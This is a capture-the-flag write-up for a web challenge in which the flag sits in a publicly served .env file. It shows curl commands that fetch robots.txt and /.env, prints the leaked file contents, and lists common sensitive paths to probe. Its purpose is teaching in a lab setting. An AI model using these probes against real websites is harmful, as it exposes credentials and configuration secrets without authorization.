Magic Link 1 — bluehens

Description

Magic Link Login Service at https://bluehens-magic-link.chals.io

A simple web application offering magic link authentication. The goal is to find the flag hidden somewhere in the application.

Analysis

Initial Recon

The main page (/) presented a simple Magic Link Login Service interface. Standard recon revealed a robots.txt file with interesting disallowed paths:

User-agent: *
Disallow: /inbox
Disallow: /dashboard
Disallow: /.env

The presence of /.env in the disallowed list is a major red flag — it suggests the environment file might be publicly accessible despite the robots.txt directive (which only instructs crawlers, not enforces access control).

The Vulnerability

The /.env file was directly accessible without authentication. This is a classic misconfiguration where sensitive configuration files are deployed to production and served by the web server.

Solution

1. Check robots.txt for hidden paths:

   curl https://bluehens-magic-link.chals.io/robots.txt

2. Access the exposed .env file:

   curl https://bluehens-magic-link.chals.io/.env

3. Retrieved contents:

   [email protected]
   TEDDYS_TOKEN=udctf{d0n7_h057_y0ur_3nv_f113}
   [email protected]
   INBOX_URL=http://localhost:5050/inbox?token=${TEDDYS_TOKEN}
   

The flag was directly exposed as TEDDYS_TOKEN in the environment file.

Red Herrings

The /inbox and /dashboard paths mentioned in robots.txt were potential rabbit holes. Once the .env leak was discovered, there was no need to explore authentication bypass or inbox exploitation — the flag was already in hand.

Lessons Learned

1. robots.txt is not access control — it's a suggestion for crawlers, not a security mechanism
2. Always check for common sensitive files: /.env, /.git/config, /config.php, /wp-config.php.bak
3. Environment files should never be in the web root — use proper deployment practices
4. The flag itself is a hint: d0n7_h057_y0ur_3nv_f113 = "don't host your env file"